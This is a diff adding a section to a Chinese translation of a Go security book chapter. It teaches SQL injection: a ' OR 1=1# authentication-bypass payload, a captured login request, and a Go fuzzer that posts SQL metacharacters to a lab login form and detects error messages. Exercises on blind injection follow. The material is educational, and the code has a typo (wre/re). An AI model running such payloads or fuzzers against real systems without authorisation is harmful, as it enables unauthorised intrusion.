ch-9 Building the SQL Injection Fuzzer

--- a/ch-9/第9章：编写并移植漏洞代码.md
+++ b/ch-9/第9章：编写并移植漏洞代码.md
@@ -160,3 +160,105 @@ SELECT * FROM users WHERE user = '' OR 1=1#'
 ```
 
 该输入在查询的末尾附加了逻辑 `OR`。该 `OR` 语句总是为真，因为1总是等于1。然后使用MySQL的注释（#）强制后端数据库忽略剩余的查询。这是有效的SQL语句。假设数据库中存在一行或多行数据，就可以绕过前面伪代码中的身份验证。
+
+#### 构建SQL注入混淆器
+
+混淆器的目的不是生成符合语法的SQL语句。恰恰相反，需要中断查询，以使语法错误的语句在后端数据库中产生错误，如O’Doyle的示例所示。为此，将发送各种SQL元字符作为输入。
+
+首先要做的是分析目标请求。通过检查HTML源代码，使用拦截代理或使用Wireshark捕获网络数据包，可以确定为登录门户提交的HTTP请求类似于以下内容：
+
+```html
+POST /WebApplication/login.jsp HTTP/1.1
+Host: 10.0.1.20:8080
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 35
+Referer: http://10.0.1.20:8080/WebApplication/ Cookie: JSESSIONID=2D55A87C06A11AAE732A601FCB9DE571 Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+username=someuser&password=somepass
+```
+
+登录表单将POST请求发送到 `http://10.0.1.20:8080/WebApplication/login.jsp`。有两个表单参数： `username` 和 `password` 。在本例中，为简洁起见，我们将混淆限制在 `username` 字段。 代码本身非常紧凑，包含几个循环，正则表达式以及创建HTTP请求。如清单9-2所示。
+
+```go
+func main() {
+	payloads := []string{
+        "baseline", ")",
+		"(",
+		"\"",
+		"'", 
+    }
+	sqlErrors := []string{ 
+        "SQL",
+		"MySQL", 
+        "ORA-", 
+        "syntax",
+	}
+	errRegexes := []*regexp.Regexp{} 
+    for _, e := range sqlErrors {
+		wre := regexp.MustCompile(fmt.Sprintf(".*%s.*", e)) 
+        errRegexes = append(errRegexes, re)
+	}
+    for _, payload := range payloads { 
+        client := new(http.Client)
+		body := []byte(fmt.Sprintf("username=%s&password=p", payload)) 
+        req, err := http.NewRequest(
+			"POST", 
+            "http://10.0.1.20:8080/WebApplication/login.jsp", 
+            bytes.NewReader(body),
+		)
+		if err != nil {
+			log.Fatalf("[!] Unable to generate request: %s\n", err) 
+        }
+		req.Header.Add("Content-Type", "application/x-www-form-urlencoded") 
+        resp, err := client.Do(req)
+		if err != nil {
+			log.Fatalf("[!] Unable to process response: %s\n", err) 
+        }
+  		body, err = ioutil.ReadAll(resp.Body) 
+        if err != nil {
+			log.Fatalf("[!] Unable to read response body: %s\n", err) 
+        }
+		resp.Body.Close()
+		for idx, re := range errRegexes { 
+        	if re.MatchString(string(body)) {
+				fmt.Printf(
+					"[+] SQL Error found ('%s') for payload: %s\n", 
+                    sqlErrors[idx],
+					payload,
+				)
+				break 
+            }
+		} 
+    }
+}
+```
+
+清单 9-2: SQL注入混淆器 (/ch-9/http_fuzz/main.go)
+
+代码首先定义要尝试的有效负载的切片。这是稍后将作为`username`请求参数的混淆列表。同样，定义了SQL错误关键字的字符串切片。将会在HTTP响应体中搜索这些值。存在任何一个值都是SQL出错的强有力的指标。也可以扩展这两个列表，但对于本例以及足够了。
+
+下一步执行一些处理工作。对于要搜索的每个错误关键字，构建并编译一个正则表达式。在主HTTP逻辑外做这些工作，就不用多次创建并编译这些正则表达式。毫无疑问，这是小的优化，但还是好的做法。使用这些已编译的正则表达式填充一个单独的切片，该切片在后面使用。
+
+接下来是该混淆器的核心逻辑。循环遍历每个有效负载，使用它们来构建一个适当的HTTP请求体，`username` 的值是当前的有效负载。使用该结果来构建针对登录表单的HTTP POST请求。然后设置 `Content-Type` 头，调用 `client.Do(req)` 发送请求。
+
+请注意，通过使用创建客户端和单个请求的长格式过程来发送请求，然后调用 `client.Do()`。 当然可以使用Go的 `http.PostForm()`函数来更简洁地实现。但是，更详细的技术可以更细粒度地控制HTTP的头。尽管本例中只设置了`Content-Type` 头，但是HTTP请求时设置额外的头的情况并不少见（例如 `User-Agent, Cookie` 等）。无法使用  `http.PostForm()`做到这一点，因此，用长路由会更容易地添加任何必须的HTTP头，尤其是对头本身进行混淆处理时。
+
+接下来，使用 `ioutil.ReadAll()` 读取HTTP响应体。有了响应体后就可以遍历所有的预编译的正则表达式了，测试响应主体中是否存在SQL 错误关键字。如果匹配到的话，就可能是一个SQL注入错误消息。程序会将负载和错误的详情输出到屏幕上，然后继续循环的下一个迭代。
+
+运行代码，以确认它可以通过易受攻击的登录表单成功识别出SQL注入漏洞。如果为 `username` 加上单引号，则会显示SQL的错误指示符，如下所示：
+
+```sh
+$ go run main.go
+[+] SQL Error found ('SQL') for payload: '
+```
+
+鼓励您尝试以下练习，以帮助更好地理解代码，理解HTTP通信的细微差别，并提高检测SQL注入的能力：
+
+1. 更新代码以测试基于时间的SQL注入。为此，必须发送各种有效负载，这些负载会在后端查询执行时引入时间延迟。需要测量往返时间，并将其与基准请求进行比较，以推断是否存在SQL注入。
+2. 更新代码以测试基于布尔的盲目SQL注入。尽管为此可以使用不同的指标，一个简单的方式是比较HTTP响应代码和基准响应。与基准响应代码的偏差，尤其是接收到500响应码（服务器内部错误），可能标示SQL注入。
+3. 预期依赖Go的 `net.http` 包来简化通信，不如尝试使用 `net` 包处理原生TCP连接。当使用 `net` 包时，需要注意 HTTP的 `Content-Length` 头，其标示消息体的长度。需要计算每次请求的准确长度，因为消息体长度会变。如果使用的是无效长度，服务器很可能会拒绝请求。
+
+下一节中，将介绍如何把漏洞开发从Python或C等其他语言移植到Go中。
